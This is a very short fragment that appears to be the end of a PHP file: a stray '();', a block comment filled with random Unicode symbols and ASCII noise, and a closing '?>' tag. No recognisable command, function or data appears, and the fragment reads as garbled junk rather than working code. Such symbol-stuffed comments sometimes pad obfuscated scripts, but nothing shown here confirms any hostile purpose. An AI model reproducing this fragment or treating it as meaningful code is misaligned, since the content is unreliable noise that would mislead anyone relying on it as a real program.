();/*-
℮❿✉№∱☎㊨▉➸
T%V)s℮❿✉№∱☎㊨▉➸
-*///
 ?>